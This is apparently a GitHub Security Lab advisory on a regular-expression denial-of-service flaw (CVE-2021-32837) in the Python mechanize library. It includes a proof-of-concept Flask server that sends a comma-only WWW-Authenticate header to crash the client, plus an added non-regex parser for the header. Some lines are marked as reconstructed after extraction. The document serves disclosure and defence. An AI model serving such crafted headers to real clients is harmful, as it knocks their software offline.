September 9, 2021

GHSL-2021-108: ReDoS (Regular Expression Denial of Service) in mechanize - CVE-2021-32837

Kevin Backhouse

Coordinated Disclosure Timeline


mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).



Tested Version




ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on mechanize by following this link.


The vulnerable regular expression is here.

mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.

The reproduction steps below first start a web server and then start mechanize against it. You can try deleting the resp.headers[... line to see how mechanize should behave when the header is absent.

# Step 1: the web server that returns the malicious challenge (run this first)
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/")  # route decorator restored; it was lost in extraction
def home():
    resp = make_response("401 Unauthorized")
    resp.status_code = 401
    # A WWW-Authenticate value made only of commas is what the vulnerable regex chokes on
    resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
    return resp

if __name__ == "__main__":
    app.run(port=8080)  # app.run(...) call reconstructed; only port=8080 survived extraction

# Step 2: the client, run in a separate process once the server is listening
import mechanize

br = mechanize.Browser()
br.add_password("http://localhost:8080", "admin", "password")
br.open("http://localhost:8080")  # br.open(...) reconstructed; parsing the 401 challenge hits the vulnerable regex
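As an added example (not mechanize's code, and not the regular expression the advisory links to), here is how a WWW-Authenticate challenge list can be split and parsed in a single left-to-right pass with no regular expression at all, so the all-comma header from the reproduction above costs O(n) instead of backtracking. It assumes the RFC 7235 challenge shape (scheme, then comma-separated name=value parameters or a single token68) and stores a token68 under a synthetic "token68" key.

```python
import string

# RFC 7230 tchar set (assumed here; this is a stand-alone example, not mechanize code)
_TCHAR = set(string.ascii_letters + string.digits + "!#$%&'*+-.^_`|~")


def is_token(s: str) -> bool:
    return bool(s) and all(c in _TCHAR for c in s)


def split_challenges(header: str) -> list:
    """Split a WWW-Authenticate value on top-level commas in one left-to-right pass.
    Commas inside quoted strings are kept; empty items (the all-comma header from the
    reproduction above) are dropped. No backtracking, so cost is O(len(header))."""
    items, buf, in_quote, escaped = [], [], False, False
    for ch in header:
        if ch == "," and not in_quote:
            if "".join(buf).strip():
                items.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
        if escaped:
            escaped = False
        elif in_quote and ch == "\\":
            escaped = True
        elif ch == '"':
            in_quote = not in_quote
    if "".join(buf).strip():
        items.append("".join(buf).strip())
    return items


def parse_challenges(header: str) -> list:
    """Group the items into (scheme, params) tuples; params is a dict."""
    challenges = []
    for item in split_challenges(header):
        name, eq, value = item.partition("=")
        if not (eq and is_token(name.strip())):  # not "name=value": starts a new scheme
            scheme, _, rest = item.partition(" ")
            challenges.append((scheme, {}))
            name, eq, value = rest.strip().partition("=")
            if not eq:  # bare "Basic", or "Bearer <token68>"
                if name:
                    challenges[-1][1]["token68"] = name  # synthetic key (assumption)
                continue
        if challenges:  # a parameter before any scheme is ignored rather than fatal
            challenges[-1][1][name.strip().lower()] = value.strip().strip('"')
    return challenges
```

Feeding the reproduction's comma-only header (or one many thousands of commas long) returns an empty list immediately, while a normal multi-challenge header is parsed into per-scheme parameter dicts.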


This issue may lead to a denial of service.



This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).


You can contact the GHSL team at, please include a reference to GHSL-2021-108 in any communication regarding this issue.